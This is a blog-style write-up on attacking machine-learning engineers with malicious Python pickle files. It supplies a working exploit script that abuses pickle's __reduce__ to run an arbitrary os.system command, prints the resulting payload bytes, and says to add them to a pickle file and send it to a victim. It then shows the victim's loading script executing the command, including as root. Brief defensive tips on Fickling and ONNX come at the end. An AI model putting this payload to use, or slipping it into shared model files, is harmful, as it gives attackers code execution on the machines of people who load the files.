Phishing Attack using Machine Learning model

I found 2 of the ML team members transfer Files related to the a model training:

  • The first was a “serialized” data generated by Python Pickle Module.

  • The second file was a python script that deserialize the first file.

import sys
import base64
import pickle
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
import keras
input=sys.argv[1]
text = base64.b64decode(input)
file = open("./vector.pickel",'rb')
vectorizer = pickle.load(file)
file.close()
...

Knowing That the pickle module requires a huge awareness while implementing.

📌 “Never deserialize data from an untrusted source while using pickle”

but they use it for a reason

The use of pickling conserves memory, enables start-and-stop model training, and makes trained models portable (and, thereby, shareable). Pickling is easy to implement, is built into Python without requiring additional dependencies, and supports serialization of custom objects. There’s little doubt about why choosing pickling for persistence is a popular practice among Python programmers and ML practitioners.

anyway,

The Attack :

Pre-trained models are typically treated as “free” byproducts of ML since they allow the valuable intellectual property like algorithms and corpora that produced the model to remain private. This gives many people the confidence to share their models over the internet, particularly for reusable computer vision and natural language processing classifiers. Websites like **PyTorch Hub** facilitate model sharing, and some libraries even provide APIs to download models from GitHub repositories automatically.

It’s all about creating a malicious pickle files. That the ML engineer would load on his device using Pickle Module in python.

The code I used to create the malicious Payload so you can add it to the Pickle File:

“For more Technical Details and why I used that script Read This

import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = (input()) #Enter A Command To Be Executed on the victim device:
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(string(pickled))

Example :

╭─root@ubuntu ~/Test 
╰─# python3 exploit.py
whoami
#Output:
b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'

add the output to any pickle file and send it to the victim when he loads it using Pickle The command will be executed on his device

Victim view:

When he runs this script for example so he could load the pickle file that i just sent to him

With out checking it,The command will be executed on his device

#import sys
#import base64
import pickle
#import numpy as np
#from sklearn.feature_extraction.text import CountVectorizer
#import keras
#input=sys.argv[1]
#text = base64.b64decode(input)
file = open("./vector.pickel",'rb')
vectorizer = pickle.load(file)
file.close()
file = open("Logistic_Model.sav",'rb')
Liner_model = pickle.load(file)
file.close()
NN_model=keras.models.load_model("nn_model.h5")
encodings =vectorizer.transform([text]).toarray()
print("Liner Model Prediction {0}".format(Liner_model.predict(encodings)[0]))
print("NN Model Prediction {0}".format(np.round(NN_model.predict(encodings)[0])))

The code here is being used for some ML stuff(used to predict something I guess) but running it on the malicious pickle file that contains my payload will trigger the system to execute the command :

 cat vector.pickel
��!�posix��system����whoami���R�. 
 python3 predict.py
iradi
#Traceback (most recent call last):
#  File "predict.py", line 12, in <module>
#    file = open("Logistic_Model.sav",'rb')
#FileNotFoundError: [Errno 2] No such file or directory: 'Logistic_Model.sav'
 sudo python3 predict.py
root
#/usr/lib/python3/dist-packages/requests/__init__.py:89: RequestsDependencyWarning: urllib3 (1.26.9) or chardet (3.0.4) doesn't match a supported version!
#  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
#Traceback (most recent call last):
#  File "predict.py", line 12, in <module>
#    file = open("Logistic_Model.sav",'rb')
#FileNotFoundError: [Errno 2] No such file or directory: 'Logistic_Model.sav'

Here is the output , an attacker would keep everything in the background “Blind”

How to stay safe :

  • Use Fickling - it has its own implementation of a Pickle Virtual Machine (PM), and it is safe to run on potentially malicious files, because it symbolically executes code rather than overtly executing it.

  • You can run Fickling’s static analyses to detect certain classes of malicious pickles by passing the --check-safety

  • there are other frameworks that avoid using pickle for serialization. For example, the Open Neural Network Exchange (ONNX) aims to provide a universal standard for encoding AI models to improve interoperability. The ONNX specification uses ProtoBuf to encode their model representations.

Last updated